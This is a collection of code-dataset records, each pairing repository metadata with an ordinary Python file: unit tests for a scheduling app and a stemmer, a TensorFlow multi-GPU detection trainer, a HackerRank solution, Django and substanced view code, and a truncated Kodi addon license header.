ab6c198286931579386d1847dbaec01086aabc5d | 7f66c9818b2a22e6dbfa832a6bb4f9f21fbd15da | /semester_1/fp/assignment_06-08/src/tests/test_services.py | 1bab656276fba77c296f87c0febc5cf5ee2ed7da | [] | no_license | caprapaul/assignments | cc3992833d4f23f74286c1800ac38dc2d9a874da | 206b049700d8a3e03b52e57960cd44f85c415fe8 | refs/heads/master | 2023-05-24T03:46:42.858147 | 2022-05-03T16:26:58 | 2022-05-03T16:26:58 | 248,552,522 | 0 | 0 | null | 2023-05-09T01:49:04 | 2020-03-19T16:31:37 | C | UTF-8 | Python | false | false | 2,911 | py | import unittest
import coverage
from repository import Repository
from services.activity_service import ActivityService, Activity
from services.person_service import PersonService, Person
from data.activity_data import *
from data.person_data import *
from cmdsys.cmdsys import CommandSystem
class TestServices(unittest.TestCase):
def test_activity_service(self):
a_repo = Repository()
p_repo = Repository()
p_repo.add_item(Person('1', get_random_name(), get_random_phone_number()), get_uid=lambda p: p.uid)
p_repo.add_item(Person('2', get_random_name(), get_random_phone_number()), get_uid=lambda p: p.uid)
p_repo.add_item(Person('3', get_random_name(), get_random_phone_number()), get_uid=lambda p: p.uid)
service = ActivityService(a_repo, p_repo)
activity1 = Activity('1234', ['1', '2'], get_random_date(), get_random_time(), 'test1')
activity2 = Activity('4321', ['1', '3'], get_random_date(), get_random_time(), 'test2')
service.add_activity(activity1)
self.assertEqual(service.get_activities(), [activity1])
service.add_activity(activity2)
self.assertEqual(service.get_activities(), [activity1, activity2])
self.assertEqual(service.get_activity(activity1.uid), activity1)
service.remove_activity(activity2.uid)
self.assertEqual(service.get_activities(), [activity1])
CommandSystem.global_undo()
self.assertEqual(service.get_activities(), [activity1, activity2])
CommandSystem.global_redo()
self.assertEqual(service.get_activities(), [activity1])
CommandSystem.global_undo()
new_activity = Activity(activity2.uid, ['1'], activity2.date, activity2.time, activity2.description)
service.update_activity(activity2.uid, new_activity)
self.assertEqual(service.get_activities(), [activity1, new_activity])
self.assertEqual(service.get_date_activities(activity1.date), [activity1])
self.assertEqual(service.get_busiest_days(), [(activity1.date, 1), (new_activity.date, 1)])
self.assertEqual(service.get_person_activities('2'), [activity1])
self.assertEqual(service.search_activities(None, None, 'test1'), [activity1])
def test_person_service(self):
a_repo = Repository()
p_repo = Repository()
service = PersonService(p_repo, a_repo)
person1 = Person('1', get_random_name(), get_random_phone_number())
person2 = Person('2', get_random_name(), get_random_phone_number())
service.add_person(person1)
self.assertEqual(service.get_persons(), [person1])
service.add_person(person2)
self.assertEqual(service.get_persons(), [person1, person2])
if __name__ == '__main__':
cov = coverage.Coverage()
cov.start()
unittest.main()
cov.stop()
cov.save()
cov.html_report(directory='covhtml')
| [
"c.paulica@gmail.com"
] | c.paulica@gmail.com |
c4afeca91e73abf6bbd3d9882cfda15357dfd482 | 6136be1772619e92d93d474838b2d9b55071e423 | /testPickler.py | 26ce40b9bde70e0ee9189bcf0f1e7cba8a784ccd | [] | no_license | Anwesh43/python-url-requests | 1aa5314ab1c362db869fbca44605d2631bde17d2 | f26ff5c83beadc3442ae087a47f18553af78c890 | refs/heads/master | 2020-05-15T11:03:44.616768 | 2019-04-19T13:11:46 | 2019-04-19T13:11:46 | 182,210,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from picklerutil import *
dict1 = loadFromFile('a.pickle')
assert dict1 == {}
dict2 = {}
dict2["a"] = 1
dict2["b"] = 2
saveToFile('a.pkl', dict2)
dict3 = loadFromFile('a.pkl')
assert dict3 == dict2
| [
"anweshthecool0@gmail.com"
] | anweshthecool0@gmail.com |
994deee1e02643256d13d5a378b1b4a3011135f6 | 1afb1fbfeb696a96a7e3cddfe4c74192c770b97d | /trainer.py | 1cb656a38f31ce48a8b43f2a0626505c97134674 | [
"Apache-2.0"
] | permissive | Guanwh/Object_Detection_Tracking | b74dc8c3c1dc9ede06b1d9c36d2e80e5af28bc6f | af7f840915f63ae498c8241e5832a4bf4aabfcc1 | refs/heads/master | 2020-06-03T21:57:43.644703 | 2019-06-10T05:00:14 | 2019-06-10T05:00:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,667 | py | # coding=utf-8
# trainer class, given the model (model has the function to get_loss())
import tensorflow as tf
import sys
from models import assign_to_device
def average_gradients(tower_grads,sum_grads=False):
"""Calculate the average/summed gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer list ranges
over the devices. The inner list ranges over the different variables.
Returns:
List of pairs of (gradient, variable) where the gradient has been averaged
across all towers.
"""
average_grads = []
nr_tower = len(tower_grads)
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = [g for g, _ in grad_and_vars]
if sum_grads:
#grad = tf.reduce_sum(grads, 0)
grad = tf.add_n(grads)
else:
grad = tf.multiply(tf.add_n(grads), 1.0 / nr_tower)
#grad = tf.reduce_mean(grads, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
average_grads.append((grad, v))
return average_grads
class Trainer():
def __init__(self,models,config):
self.config = config
self.models = models
self.global_step = models[0].global_step #
learning_rate = config.init_lr
if config.use_lr_decay:
# always use warmup, set step to zero to disable
warm_up_start = config.init_lr * 0.33
# linear increasing from 0.33*lr to lr in warm_up_steps
warm_up_lr = tf.train.polynomial_decay(
warm_up_start,
self.global_step,
config.warm_up_steps,
config.init_lr,
power=1.0,
)
if config.use_cosine_schedule:
max_steps = int(config.train_num_examples / config.im_batch_size * config.num_epochs)
schedule_lr = tf.train.cosine_decay(
config.init_lr,
self.global_step - config.warm_up_steps - config.same_lr_steps,
max_steps - config.warm_up_steps - config.same_lr_steps,
alpha=0.0
)
else:
decay_steps = int(config.train_num_examples / config.im_batch_size * config.num_epoch_per_decay)
schedule_lr = tf.train.exponential_decay(
config.init_lr,
self.global_step,
decay_steps,
config.learning_rate_decay,
staircase=True
)
boundaries = [config.warm_up_steps, config.warm_up_steps + config.same_lr_steps] # before reaching warm_up steps, use the warm up learning rate.
values = [warm_up_lr, config.init_lr, schedule_lr]
learning_rate = tf.train.piecewise_constant(self.global_step, boundaries, values)
print "learning rate warm up lr from %s to %s in %s steps, then keep for %s steps, then schedule learning rate decay" % (warm_up_start, config.init_lr, config.warm_up_steps, config.same_lr_steps)
self.learning_rate = learning_rate
else:
self.learning_rate = None
if config.optimizer == 'adadelta':
self.opt = tf.train.AdadeltaOptimizer(learning_rate)
elif config.optimizer == "adam":
self.opt = tf.train.AdamOptimizer(learning_rate)
elif config.optimizer == "sgd":
self.opt = tf.train.GradientDescentOptimizer(learning_rate)
elif config.optimizer == "momentum":
self.opt = tf.train.MomentumOptimizer(learning_rate, momentum=config.momentum)
else:
print "optimizer not implemented"
sys.exit()
self.rpn_label_losses = [model.rpn_label_loss for model in models]
self.rpn_box_losses = [model.rpn_box_loss for model in models]
self.fastrcnn_label_losses = [model.fastrcnn_label_loss for model in models]
self.fastrcnn_box_losses = [model.fastrcnn_box_loss for model in models]
if config.wd is not None:
self.wd = [model.wd for model in models]
if config.use_small_object_head:
self.so_label_losses = [model.so_label_loss for model in models]
if config.add_act:
self.act_losses = [model.act_losses for model in self.models]
self.losses = []
self.grads = []
for model in self.models:
gpuid = model.gpuid
# compute gradients on each gpu devices
with tf.device(assign_to_device("/gpu:%s"%(gpuid), config.controller)):
self.losses.append(model.loss)
grad = self.opt.compute_gradients(model.loss)
grad = [(g,var) for g, var in grad if g is not None] # we freeze resnet, so there will be none gradient
# whehter to clip gradient
if config.clip_gradient_norm is not None:
grad = [(tf.clip_by_value(g, -1*config.clip_gradient_norm, config.clip_gradient_norm), var) for g, var in grad]
self.grads.append(grad)
# apply gradient on the controlling device
with tf.device(config.controller):
avg_loss = tf.reduce_mean(self.losses)
avg_grads = average_gradients(self.grads,sum_grads=True)
self.train_op = self.opt.apply_gradients(avg_grads,global_step=self.global_step)
self.loss = avg_loss
def step(self,sess,batch,get_summary=False):
assert isinstance(sess,tf.Session)
config = self.config
# idxs is a tuple (23,123,33..) index for sample
batchIdx,batch_datas = batch
#assert len(batch_datas) == len(self.models) # there may be less data in the end
feed_dict = {}
for batch_data, model in zip(batch_datas, self.models): # if batch is smaller so will the input?
feed_dict.update(model.get_feed_dict(batch_data,is_train=True))
sess_input = []
sess_input.append(self.loss)
for i in xrange(len(self.models)):
sess_input.append(self.rpn_label_losses[i])
sess_input.append(self.rpn_box_losses[i])
sess_input.append(self.fastrcnn_label_losses[i])
sess_input.append(self.fastrcnn_box_losses[i])
if config.wd is not None:
sess_input.append(self.wd[i])
if config.use_small_object_head:
sess_input.append(self.so_label_losses[i])
if config.add_act:
sess_input.append(self.act_losses[i])
sess_input.append(self.train_op)
sess_input.append(self.learning_rate)
outs = sess.run(sess_input,feed_dict=feed_dict)
loss = outs[0]
skip = 4 + int(config.add_act) + int(config.use_small_object_head)
rpn_label_losses = outs[1::skip][:len(self.models)]
rpn_box_losses = outs[2::skip][:len(self.models)]
fastrcnn_label_losses = outs[3::skip][:len(self.models)]
fastrcnn_box_losses = outs[4::skip][:len(self.models)]
now = 4
wd = [-1 for m in self.models]
if config.wd is not None:
now+=1
wd = outs[now::skip][:len(self.models)]
so_label_losses = [-1 for m in self.models]
if config.use_small_object_head:
now+=1
so_label_losses = outs[now::skip][:len(self.models)]
act_losses = [-1 for m in self.models]
if config.add_act:
now+=1
act_losses = outs[now::skip][:len(self.models)]
"""
if config.add_act:
out = [self.loss, self.rpn_label_loss, self.rpn_box_loss, self.fastrcnn_label_loss, self.fastrcnn_box_loss, self.train_op]
act_losses_pl = [model.act_losses for model in self.models]
out = act_losses_pl + out
things = sess.run(out,feed_dict=feed_dict)
act_losses = things[:len(act_losses_pl)]
loss,rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, train_op = things[len(act_losses_pl):]
else:
loss,rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, train_op = sess.run([self.loss,self.rpn_label_loss, self.rpn_box_loss, self.fastrcnn_label_loss, self.fastrcnn_box_loss,self.train_op],feed_dict=feed_dict)
act_losses = None
"""
learning_rate = outs[-1]
return loss, wd, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses, act_losses, learning_rate
| [
"junweil@cs.cmu.edu"
] | junweil@cs.cmu.edu |
e819a2b88a14f5ede5bdc9836a8c201e69a8ee48 | ff5eea95bb0827cb086c32f4ec1c174b28e5b82d | /gammapy/astro/__init__.py | 015054cb8f5eec0b26a1bd245e06b6d7a5f3664f | [] | no_license | pflaumenmus/gammapy | 4830cc5506a4052658f30077fa4e11d8c685ede0 | 7b5caf832c9950c886528ca107203ce9b83c7ebf | refs/heads/master | 2021-01-15T23:27:46.521337 | 2013-09-25T14:23:35 | 2013-09-25T14:23:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Astrophysical source and population models
"""
from .pulsar import *
from .pwn import *
from .snr import *
| [
"Deil.Christoph@gmail.com"
] | Deil.Christoph@gmail.com |
6fd0477a22c33b117b42125a6e057df913881c55 | 48f73b5b78da81c388d76d685ec47bb6387eefdd | /scrapeHackerrankCode/codes/cats-and-a-mouse.py | ca00be6a7e4c1e023ad75c17f954266b7f54f1c9 | [] | no_license | abidkhan484/hacerrankScraping | ad0ceda6c86d321d98768b169d63ea1ee7ccd861 | 487bbf115117bd5c293298e77f15ae810a50b82d | refs/heads/master | 2021-09-18T19:27:52.173164 | 2018-07-18T12:12:51 | 2018-07-18T12:12:51 | 111,005,462 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 456 | py | # Accepted
# Python 3
#!/bin/python3
import sys
q = int(input().strip())
for a0 in range(q):
x,y,z = input().strip().split(' ')
x,y,z = [int(x),int(y),int(z)]
#position of cat A to mouse is c1
c1 = x-z
if (c1<0):
c1 = -c1
#position of cat B to mouse is c2
c2 = y-z
if (c2<0):
c2 = -c2
if (c1>c2):
print("Cat B")
elif (c2>c1):
print("Cat A")
else:
print("Mouse C")
| [
"abidkhan484@gmail.com"
] | abidkhan484@gmail.com |
93e48303735a8b4f1377af9f4955cdd1ce80e27e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03352/s380195250.py | c8f616bc533e0145002aa7156f98f0a57f0f9297 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | import math
X = int(input())
list1 = []
for i in range(2,X+1):
for j in range(2,int((X + 1)/2)):
a = math.log10(i)/math.log10(j)
if a.is_integer():
list1.append(i)
if list1 == []:
print(1)
else:
print(max(list1))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
9bda41dd7233be94e1d43c731d04583cd8d9da2a | 717fbff92a7998660dc572666b045500cf028dff | /CRAB_SUBMISSION/Pt_100_withoutPU/crab_reco_50_2ndfull_2nd.py | bf11bc0b4fd441667be79fcaae38767ecf6f3ac8 | [] | no_license | neharawal14/muon_gun_project | 20c84874c14b75cb5fed4e9b7958927f6ddaf9f9 | efccbc36c4d511f1b8dafed8292604331b7b38ae | refs/heads/main | 2023-08-22T15:24:21.255977 | 2021-09-22T17:46:25 | 2021-09-22T17:46:25 | 409,301,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config
config = config()
config.General.requestName = 'SingleMuPt50_2ndfull_2nd_large_step3'
config.General.workArea = 'crab_projects_pt50_2ndfull_2nd'
config.General.transferOutputs = True
config.General.failureLimit=1
config.General.transferLogs=True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'SingleMuPt50_2ndfull_2nd_GEN_DIGI_L1_RAW2DIGI_RECO.py'
#config.Data.outputPrimaryDataset = 'MinBias'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 1
#NJOBS = 2000 # This is not a configuration parameter, but an auxiliary variable that we use in the next line.
#config.Data.totalUnits = config.Data.unitsPerJob * NJOBS
config.Data.publication = True
#config.Data.outputDatasetTag = 'ZMuMu_step2'
#config.Data.outputPrimaryDataset = 'ZMuMu_step2_ferrico'
config.Data.inputDataset = '/SingleMuPt50_2ndfull_2nd_large_GEN-SIM_step1_neha/nrawal-crab_SingleMuPt50_2ndfull_2nd_large_step2-b92895268740895c325a8071b664b5b5/USER'
#config.Data.inputDataset = '/ZMuMu_GEN-SIM_step1_ferrico/ferrico-ZMuMu_GEN-SIM_step1-9eadee95878022f078e16d6b70fe376c/USER'
config.Data.inputDBS = 'phys03'
config.Site.storageSite = 'T2_US_Florida'
| [
"nrawal@lxplus.cern.ch"
] | nrawal@lxplus.cern.ch |
5d7cc648684a2ad43296c9188ed9c4fca05f8fcb | 9252a2c661404e596bb81474ae56ff836ad21eb4 | /Python/10_Error_Exception/try.py | 7343bc785aca8afd741cf2211edbec66c523ebe8 | [] | no_license | yang75n/programming-language-guide | 242c6d094e114240a7d0650ed12b7dc8b074a5e4 | 0c6ff76c859f1283ee39a547bb81bb9236d4a303 | refs/heads/master | 2021-06-29T16:38:01.535856 | 2021-03-05T07:32:08 | 2021-03-05T07:32:08 | 223,430,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | while True:
try:
x = int(input("请输入一个数字: "))
break
except ValueError:
print("您输入的不是数字,请再次尝试输入!")
| [
"you@example.com"
] | you@example.com |
36312377ff350c3df7aded430feadb6bc3f2a9fd | c163ffbec8ed657adb4e6633373492a6166c39cd | /substanced/sdi/views/indexing.py | dc67ae430b609340ab45c102b18a28ef127fd154 | [
"BSD-3-Clause-Modification"
] | permissive | reebalazs/substanced | b085d92a725efff45f430d6a2513573a86005a5b | 921ae5abfc6b04d009a55ed3405563589cddc88c | refs/heads/master | 2021-01-15T22:41:50.581066 | 2012-11-20T14:02:21 | 2012-11-20T14:02:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,914 | py | from pyramid.view import view_defaults
from pyramid.httpexceptions import HTTPFound
from pyramid.session import check_csrf_token
from ...catalog import (
catalog_view_factory_for,
CatalogViewWrapper,
)
from ...content import find_services
from ...util import oid_of
from .. import (
mgmt_view,
MIDDLE
)
@view_defaults(
catalogable=True,
name='indexing',
permission='sdi.manage-catalog',
)
class IndexingView(object):
catalog_view_factory_for = staticmethod(catalog_view_factory_for) # testing
def __init__(self, context, request):
self.context = context
self.request = request
@mgmt_view(
renderer='templates/indexing.pt',
tab_title='Indexing',
tab_after=MIDDLE, # try not to be the default tab, we're too obscure
)
def show(self):
oid = oid_of(self.context)
catalogs = []
for catalog in find_services(self.context, 'catalog'):
indexes = []
catalogs.append((catalog, indexes))
for index in catalog.values():
docrepr = index.document_repr(oid, '(not indexed)')
indexes.append({'index':index, 'value':docrepr})
return {'catalogs':catalogs}
@mgmt_view(request_method='POST', tab_title=None)
def reindex(self):
context = self.context
request = self.request
check_csrf_token(request)
oid = oid_of(self.context)
catalog_view_factory = self.catalog_view_factory_for(
context, request.registry)
if catalog_view_factory:
wrapper = CatalogViewWrapper(context, catalog_view_factory)
for catalog in find_services(context, 'catalog'):
catalog.reindex_doc(oid, wrapper)
request.flash_with_undo('Object reindexed', 'success')
return HTTPFound(request.mgmt_url(self.context, '@@indexing'))
| [
"chrism@plope.com"
] | chrism@plope.com |
5803bce5c8dd22cf1776e2fcc7389efe58b99768 | 6ffc81125d6bb5f8476f95b2334a27807b8290de | /tests/test_parse.py | 1e7a4e1614041fc569252d27d69c2636434b2ced | [
"BSD-2-Clause",
"Apache-2.0"
] | permissive | oaqa/FlexNeuART | 4cb341ca3c3f94fa28a7cfd4aef5451de3a4a2cb | 0bd3e06735ff705731fb6cee62d3486276beccdf | refs/heads/master | 2023-09-01T00:19:33.980081 | 2023-05-26T19:19:30 | 2023-05-26T19:19:30 | 64,071,121 | 156 | 21 | Apache-2.0 | 2023-09-10T01:27:05 | 2016-07-24T15:08:03 | Java | UTF-8 | Python | false | false | 665 | py | #!/usr/bin/env python
import unittest
from flexneuart.text_proc.parse import KrovetzStemParser
class TestKrovetzStemParser(unittest.TestCase):
# This are a very basic tests, but they are functional
def basic_tests(self):
parser = KrovetzStemParser(['is', 'a'])
self.assertEqual(parser('This IS a simplest tests'), 'this simplest test')
self.assertEqual(parser('This IS a simplest teStEd'), 'this simplest test')
self.assertEqual(parser('This IS a simplest-teStEd'), 'this simplest test')
self.assertEqual(parser('This IS a simplest#teStEd'), 'this simplest test')
if __name__ == "__main__":
unittest.main()
| [
"leo@boytsov.info"
] | leo@boytsov.info |
937b9f9d39c95c4381e0d93c2397840ab7af652a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02987/s818435683.py | 7cfe08a62edfc1ca0bfee4cf0d5452b18db63878 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | s = input().split()
b = list(s[0][0] + s[0][1] + s[0][2] + s[0][3])
sset = set(b)
if len(sset) == 2:
print('Yes')
else:
print('No') | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
841cdbbcc333c4a305e51582f43857977b301cf7 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_6665.py | 5372da5606559fecb37e86171cac99324584bf4c | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py | # TypeError in Django
url(r'^koszyk/$', 'app_name.views.koszyk', name="sklep_koszyk"),
url(r'^koszyk/dodaj/(\d+)/$', 'app_name.views.koszyk_dodaj', name="sklep_koszyk_dodaj"),
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
b99317af4560c6df672ceda2c1599ab07f34961c | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/cachitas/revenge_of_the_pancakes.py | c86f379820b17e6d7b83f5e4d4a37df87be2c178 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,883 | py | import logging
log = logging.getLogger(__name__)
def prepare_pancakes(pancakes_pile):
log.info('Pancakes pile: %s' % pancakes_pile)
maneuvers = 0
n = len(pancakes_pile)
ideal_pile = '+' * n
while pancakes_pile != ideal_pile:
log.debug('Pancake pile is not ready to serve: %s' % pancakes_pile)
# Lookup pankace pile from the bottom
for i, pancake in enumerate(pancakes_pile[::-1]):
if pancake == '-':
lowest_incorrect_pancake = n - i - 1
log.debug('Lowest incorrect pancake index: %d'
% lowest_incorrect_pancake)
break
else:
log.info('Serving pancakes. It required %d maneuvers' % maneuvers)
return maneuvers
pancakes_pile = _flip_top_pancakes(
pancakes_pile, lowest_incorrect_pancake)
maneuvers += 1
log.info('Serving pancakes. It required %d maneuvers' % maneuvers)
return maneuvers
def _flip_top_pancakes(pancakes_pile, n):
top_stack, rest = pancakes_pile[:n+1], pancakes_pile[n+1:]
log.debug('Flipping first pancakes [%s](%s)' % (top_stack, rest))
stack_flipped = [_flip(pancake) for pancake in top_stack]
stack_after_maneuver = ''.join(stack_flipped)
pancakes_pile = stack_after_maneuver + pancakes_pile[n+1:]
log.debug('Flipping result: %s' % pancakes_pile)
return str(pancakes_pile)
def _flip(pancake):
if pancake == '+':
return '-'
elif pancake == '-':
return '+'
else:
raise ValueError(pancake)
if __name__ == '__main__':
logging.basicConfig(level='INFO')
T = int(input()) # read a line with a single integer (input size)
for i in range(1, T + 1):
log.info(50 * '-' + ' CASE {:>d}'.format(i))
S = input()
print("Case #{}: {}".format(i, prepare_pancakes(S)))
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
760704eb82954bce2f7199f574320a6724fcdf28 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/age_sex_20190618093311.py | cca1d6257ba56a454e2c1c044dda556e97e0897c | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 867 | py | # -*- coding:utf-8 -*-
import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHR-all')#txt目录提取
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrtxt = os.path.basename(emrtxt)
emrtxt_str = re.findall(r'(^.+?)\_',emrtxt)#提取ID
emrtxt = "".join(emrtxt_str)#转成str
out = []
for line in f.readlines():
if line.find(r'男')>-1:
out.append('M')
if line.find(r'女')>-1:
out.append('W')
if line.find('岁')>-1:
line = re.sub('岁','',line)
lien = ''.join(line)
out.append(line)
break
output = ' '.join(out)
EMRdef.text_create(r'D:\DeepLearning ER\EHRbase','.txt' ,emrtxt,output)
| [
"1044801968@qq.com"
] | 1044801968@qq.com |
214f2c895076e8f4b959413b437dfafe392835a9 | 2f46c6463d4f871a72d4296c3dae00f029e892f1 | /src/cogent3/util/transform.py | 92b61230bf9fa8ef70c530cf4d580f2316f65502 | [
"BSD-3-Clause"
] | permissive | BrendanBeaton/cogent3 | a09376c55f24da837690219157770ad94e917579 | e10f4f933921d52b000096b7c016190a1602add6 | refs/heads/master | 2022-12-02T07:59:11.112306 | 2020-06-30T05:40:33 | 2020-06-30T05:40:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,676 | py | #!/usr/bin/env python
"""Provides transformations of functions and other objects.
Includes:
Standard combinatorial higher-order functions adapted from David Mertz (2003),
"Text Processing in Python", Chapter 1.
Functions for performing complex tests on strings, e.g. includes_any or
includes_all.
Functions for generating combinations, permutations, or cartesian products
of lists.
"""
__author__ = "Sandra Smit"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Sandra Smit", "Rob Knight", "Zongzhi Liu"]
__license__ = "BSD-3"
__version__ = "2020.6.30a"
__maintainer__ = "Sandra Smit"
__email__ = "sandra.smit@colorado.edu"
__status__ = "Production"
maketrans = str.maketrans
# standard combinatorial HOF's from Mertz
def per_shortest(total, x, y):
"""Divides total by min(len(x), len(y)).
Useful for normalizing per-item results from sequences that are zipped
together. Always returns 0 if one of the sequences is empty (to
avoid divide by zero error).
"""
shortest = min(len(x), len(y))
if not shortest:
return 0
else:
return total / shortest
def per_longest(total, x, y):
"""Divides total by max(len(x), len(y)).
Useful for normalizing per-item results from sequences that are zipped
together. Always returns 0 if one of the sequences is empty (to
avoid divide by zero error).
"""
longest = max(len(x), len(y))
if not longest:
return 0
else:
return total / longest
class for_seq(object):
"""Returns function that applies f(i,j) to i,j in zip(first, second).
f: f(i,j) applying to elements of the sequence.
aggregator: method to reduce the list of results to a scalar. Default: sum.
normalizer: f(total, i, j) that normalizes the total as a function of
i and j. Default is length_normalizer (divides by the length of the shorter
of i and j). If normalizer is None, no normalization is performed.
Will always truncate to length of the shorter sequence (because of the use
of zip).
"""
def __init__(self, f, aggregator=sum, normalizer=per_shortest):
self.f = f
self.aggregator = aggregator
self.normalizer = normalizer
def __call__(self, first, second):
f = self.f
if self.normalizer is None:
return self.aggregator([f(i, j) for i, j in zip(first, second)])
else:
return self.normalizer(
self.aggregator([f(i, j) for i, j in zip(first, second)]), first, second
)
# convenience functions for modifying objects
class KeepChars(object):
"""Returns a filter object o(s): call to return a filtered string.
Specifically, strips out everything in s that is not in keep.
This filter is case sensitive by default.
"""
allchars = bytes(range(256))
def __init__(self, keep, case_sens=True):
"""Returns a new KeepChars object, based on string keep"""
if not case_sens:
low = keep.lower()
up = keep.upper()
keep = low + up
keep = keep.encode("utf-8")
self._strip_table = dict([(c, None) for c in self.allchars if c not in keep])
def __call__(self, s):
"""f(s) -> s, translates using self.allchars and self.delchars"""
if s is None:
raise TypeError
if isinstance(s, bytes):
s = s.decode("utf8")
s = str(s)
return s.translate(self._strip_table)
def first_index_in_set(seq, items):
"""Returns index of first occurrence of any of items in seq, or None."""
for i, s in enumerate(seq):
if s in items:
return i
| [
"Gavin.Huttley@anu.edu.au"
] | Gavin.Huttley@anu.edu.au |
8835f0a2b179ed88083d3cd9023db727730c613c | eab0ec43806fb7f010ec0673370038f07c5ceefe | /NflmCA/venv/Scripts/easy_install-3.5-script.py | 47054a2c28778dfbb7575b04f64485242af3a66a | [] | no_license | tanaypatil/custom-django-admin | 023d915ce061a312d51d79f6b2135d744b07af15 | 5d6743468c03b642c7a059db681df3f83d71eff4 | refs/heads/master | 2020-06-13T03:53:18.067184 | 2019-06-30T14:32:19 | 2019-06-30T14:32:19 | 194,525,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | #!"C:\Users\Tanay Patil\PycharmProjects\NflmCA\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.0.1','console_scripts','easy_install-3.5'
__requires__ = 'setuptools==39.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.0.1', 'console_scripts', 'easy_install-3.5')()
)
| [
"tanaypatil197@gmail.com"
] | tanaypatil197@gmail.com |
88d35b2362956cce0f445f8acddc49bbf7f1db61 | 9a66a9acebfb324a5303f9bfe0570145e4a31554 | /plugin.video.salts/scrapers/rlshd_scraper.py | c80b28383ad7805d3086165a9b08dc1121810d5f | [] | no_license | n0490b/tdbaddon | f229e9f7b8587925cfe38acb04c5f5c70bbf1837 | 21628f1b40e2f854cc3b63acf0d632bb5daecdac | refs/heads/master | 2021-01-23T04:58:23.101284 | 2017-03-26T09:35:56 | 2017-03-26T09:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,007 | py | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
